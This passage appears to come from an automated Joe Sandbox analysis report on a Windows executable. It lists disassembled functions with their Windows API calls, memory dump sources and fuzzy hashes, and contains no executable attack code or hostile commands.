                                                                                                                                                    • Part of subcall function 0045810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0045812B
                                                                                                                                                    • Part of subcall function 0045810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0045813A
                                                                                                                                                    • Part of subcall function 0045810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00458141
                                                                                                                                                    • Part of subcall function 0045810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00458157
                                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 004586A3
                                                                                                                                                  • _memcmp.LIBCMT ref: 004586C6
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004586FC
                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 00458703
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1592001646-0
                                                                                                                                                  • Opcode ID: 2c5cbc444dc25df1d3482cf24a588846e82523edbc0970691195306e100f3dfe
                                                                                                                                                  • Instruction ID: 730e04a0c9a28b219d77ec22e6a84493cb1498a8cd35620125a6bebab32f77ad
                                                                                                                                                  • Opcode Fuzzy Hash: 2c5cbc444dc25df1d3482cf24a588846e82523edbc0970691195306e100f3dfe
                                                                                                                                                  • Instruction Fuzzy Hash: E4215A71E01109EBDB10DFA4C989BAEB7B8EF45306F15405EE844AB242DB34AE09CB58
                                                                                                                                                  Function 0042098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • __setmode.LIBCMT ref: 004209AE
                                                                                                                                                    • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00467896,?,?,00000000), ref: 00405A2C
                                                                                                                                                    • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00467896,?,?,00000000,?,?), ref: 00405A50
                                                                                                                                                  • _fprintf.LIBCMT ref: 004209E5
                                                                                                                                                  • OutputDebugStringW.KERNEL32(?), ref: 00455DBB
                                                                                                                                                    • Part of subcall function 00424AAA: _flsall.LIBCMT ref: 00424AC3
                                                                                                                                                  • __setmode.LIBCMT ref: 00420A1A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 521402451-0
                                                                                                                                                  • Opcode ID: f8cbf8bec01b3a097d2808ee2000faaa12c69a290c37b152d83dab8e3784db7b
                                                                                                                                                  • Instruction ID: 506474fa098cb1490a8c63a0929ef03edd2b6c88ff5c0dc42923ee6bdce5b67a
                                                                                                                                                  • Opcode Fuzzy Hash: f8cbf8bec01b3a097d2808ee2000faaa12c69a290c37b152d83dab8e3784db7b
                                                                                                                                                  • Instruction Fuzzy Hash: E31126727041146FDB04B2A5BC469BE77A8DF81318FA0416FF105632C3EE3C5946879D
                                                                                                                                                  Function 00471767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 004717A3
                                                                                                                                                    • Part of subcall function 0047182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0047184C
                                                                                                                                                    • Part of subcall function 0047182D: InternetCloseHandle.WININET(00000000), ref: 004718E9
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Internet$CloseConnectHandleOpen
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1463438336-0
                                                                                                                                                  • Opcode ID: 0d77803af34525429c563aa5a91095bc3ad4b0cccef2d99c89baa2dfe7cd75a8
                                                                                                                                                  • Instruction ID: 71b6e4b1fe2b952a6419c9952bf0f018ffc457c15b1f1ac8131077084853f328
                                                                                                                                                  • Opcode Fuzzy Hash: 0d77803af34525429c563aa5a91095bc3ad4b0cccef2d99c89baa2dfe7cd75a8
                                                                                                                                                  • Instruction Fuzzy Hash: 1121C235200601BFEB169F648C01FFBBBA9FF48710F10842FF91996660D775D815A7A9
                                                                                                                                                  Function 004350E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • _free.LIBCMT ref: 00435101
                                                                                                                                                    • Part of subcall function 0042571C: __FF_MSGBANNER.LIBCMT ref: 00425733
                                                                                                                                                    • Part of subcall function 0042571C: __NMSG_WRITE.LIBCMT ref: 0042573A
                                                                                                                                                    • Part of subcall function 0042571C: RtlAllocateHeap.NTDLL(00B60000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocateHeap_free
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 614378929-0
                                                                                                                                                  • Opcode ID: a8023bd45059f91bbc3ba768b53d43d26a35538f988b85c4c1a404ec765a44f4
                                                                                                                                                  • Instruction ID: 565aca9384bc55ec46628ce6f4316e74187f5c3bb682111b66b5609c454c8c26
                                                                                                                                                  • Opcode Fuzzy Hash: a8023bd45059f91bbc3ba768b53d43d26a35538f988b85c4c1a404ec765a44f4
                                                                                                                                                  • Instruction Fuzzy Hash: D411E072E01A21AECF313FB1BC05B5E3B989B183A5F50593FF9049A250DE3C89418B9C
                                                                                                                                                  Function 004044A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • _memset.LIBCMT ref: 004044CF
                                                                                                                                                    • Part of subcall function 0040407C: _memset.LIBCMT ref: 004040FC
                                                                                                                                                    • Part of subcall function 0040407C: _wcscpy.LIBCMT ref: 00404150
                                                                                                                                                    • Part of subcall function 0040407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00404160
                                                                                                                                                  • KillTimer.USER32(?,00000001,?,?), ref: 00404524
                                                                                                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00404533
                                                                                                                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0043D4B9
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1378193009-0
                                                                                                                                                  • Opcode ID: 8233c1c53fe49e8a502b553c2e8f55af8437e20015ea4a24a99bc4102d4ad802
                                                                                                                                                  • Instruction ID: dcb2c65cf3c1a774e1d203f737fabc32089307ed9affa8f53aec521d9447171b
                                                                                                                                                  • Opcode Fuzzy Hash: 8233c1c53fe49e8a502b553c2e8f55af8437e20015ea4a24a99bc4102d4ad802
                                                                                                                                                  • Instruction Fuzzy Hash: 6F21FBB0904754AFE7328B249C45BEBBBEC9B55318F0404AFE79A56281C3782984CB49
                                                                                                                                                  Function 00476369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00467896,?,?,00000000), ref: 00405A2C
                                                                                                                                                    • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00467896,?,?,00000000,?,?), ref: 00405A50
                                                                                                                                                  • gethostbyname.WSOCK32(?,?,?), ref: 00476399
                                                                                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 004763A4
                                                                                                                                                  • _memmove.LIBCMT ref: 004763D1
                                                                                                                                                  • inet_ntoa.WSOCK32(?), ref: 004763DC
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1504782959-0
                                                                                                                                                  • Opcode ID: 762733e25637bc439446b3da9c5912462bd92284ca480afd830ba0cdb0608b85
                                                                                                                                                  • Instruction ID: c304d0e6e06ed5b692ae79d4b0fe9c52f6c8e6d6f1456e813eafe14ad56adccd
                                                                                                                                                  • Opcode Fuzzy Hash: 762733e25637bc439446b3da9c5912462bd92284ca480afd830ba0cdb0608b85
                                                                                                                                                  • Instruction Fuzzy Hash: F2114F71600109AFCB00FBA5D946CEE77B9EF04314B54847AF505B72A2DB389E14CB69
                                                                                                                                                  Function 00458B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00458B61
                                                                                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458B73
                                                                                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458B89
                                                                                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458BA4
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                                  • Opcode ID: ca17c677d33199d8ade5de32726d6ec6320cad89c97852bedaa9fe676a546a7f
                                                                                                                                                  • Instruction ID: 6d6e4feeaee75d02a1ec4dd614e497ad2765f264ac6e3ed00c825e9843e5ba14
                                                                                                                                                  • Opcode Fuzzy Hash: ca17c677d33199d8ade5de32726d6ec6320cad89c97852bedaa9fe676a546a7f
                                                                                                                                                  • Instruction Fuzzy Hash: 56113A79900218BFDB10DB95C884EAEBB78EB48710F2041A6E900B7250DA716E15DB94
                                                                                                                                                  Function 00401290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                                                                                                  • DefDlgProcW.USER32(?,00000020,?), ref: 004012D8
                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 0043B5FB
                                                                                                                                                  • GetCursorPos.USER32(?), ref: 0043B605
                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 0043B610
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4127811313-0
                                                                                                                                                  • Opcode ID: 1c8f769d0dee53fb8c778101d630ad27ed939e462680dcfd79beede70ddeeb32
                                                                                                                                                  • Instruction ID: ee9d34d9398b5f91fab5137b757b2ab9dbcc007e8162b1c14587a54292e2d527
                                                                                                                                                  • Opcode Fuzzy Hash: 1c8f769d0dee53fb8c778101d630ad27ed939e462680dcfd79beede70ddeeb32
                                                                                                                                                  • Instruction Fuzzy Hash: 39112B39510059FBCB00EF99D8899AE77B8FB05300F4008AAF901F7291D734BA569BA9
                                                                                                                                                  Function 00AB218B Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00AB15D8,00000000,00000000,?,00AB2132,00AB15D8,00000000,00000000,00000000,?,00AB2283,00000006,FlsSetValue), ref: 00AB21BD
                                                                                                                                                  • GetLastError.KERNEL32(?,00AB2132,00AB15D8,00000000,00000000,00000000,?,00AB2283,00000006,FlsSetValue,00AC6FC4,FlsSetValue,00000000,00000364,?,00AB192D), ref: 00AB21C9
                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00AB2132,00AB15D8,00000000,00000000,00000000,?,00AB2283,00000006,FlsSetValue,00AC6FC4,FlsSetValue,00000000), ref: 00AB21D7
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_a70000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3177248105-0
                                                                                                                                                  • Opcode ID: 3a1b7d583592d6dbebd860e0caa013bbb539836c3fbf58b7ebb51df05eb095b5
                                                                                                                                                  • Instruction ID: f7a0fc28f0731604c98515e08103724cdf1727299cdae39b3ef114004ea1cc09
                                                                                                                                                  • Opcode Fuzzy Hash: 3a1b7d583592d6dbebd860e0caa013bbb539836c3fbf58b7ebb51df05eb095b5
                                                                                                                                                  • Instruction Fuzzy Hash: 8C01F732601222ABC7218BACFC44FD63BACAF15BA0B210721FA16E3152D720D902C7F1
                                                                                                                                                  Function 00436FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3016257755-0
                                                                                                                                                  • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                                                  • Instruction ID: 3d94be51af7e819a6a5def82be0e086b27bd99855e7e965629bee2c507946819
                                                                                                                                                  • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                                                  • Instruction Fuzzy Hash: 78014EB244414ABBCF2A5E84CC41CEE3F72BB1C354F599416FA9858131D23AD9B1AB85
                                                                                                                                                  Function 0048B2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 0048B2E4
                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 0048B2FC
                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 0048B320
                                                                                                                                                  • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0048B33B
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 357397906-0
                                                                                                                                                  • Opcode ID: e8173e98fc73e507b6a04d2f7e54522757b65c9b70d93ac78b94b59699abf8f9
                                                                                                                                                  • Instruction ID: e0f35f64d62337ec24ef524e52db7040af9c6cc02db1932b8591958b9ea84988
                                                                                                                                                  • Opcode Fuzzy Hash: e8173e98fc73e507b6a04d2f7e54522757b65c9b70d93ac78b94b59699abf8f9
                                                                                                                                                  • Instruction Fuzzy Hash: B9117775D00209EFDB01DF99C444AEEBBF5FF18310F104566E914E3220D735AA558F94
                                                                                                                                                  Function 00466BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 00466BE6
                                                                                                                                                    • Part of subcall function 004676C4: _memset.LIBCMT ref: 004676F9
                                                                                                                                                  • _memmove.LIBCMT ref: 00466C09
                                                                                                                                                  • _memset.LIBCMT ref: 00466C16
                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 00466C26
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 48991266-0
                                                                                                                                                  • Opcode ID: edf19e1ede3b3e611382947217f22c9f8674c26c836af00265cbaa5f5bcd5e3d
                                                                                                                                                  • Instruction ID: 06c116e41b1fbc97defe022da98efa456519ca017efd3746de7cd937a477406a
                                                                                                                                                  • Opcode Fuzzy Hash: edf19e1ede3b3e611382947217f22c9f8674c26c836af00265cbaa5f5bcd5e3d
                                                                                                                                                  • Instruction Fuzzy Hash: ACF0547A200110BBCF016F56EC85A8ABF29EF45325F4480A9FE085E227D775E811CBB9
                                                                                                                                                  Function 00402218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetSysColor.USER32(00000008), ref: 00402231
                                                                                                                                                  • SetTextColor.GDI32(?,000000FF), ref: 0040223B
                                                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 00402250
                                                                                                                                                  • GetStockObject.GDI32(00000005), ref: 00402258
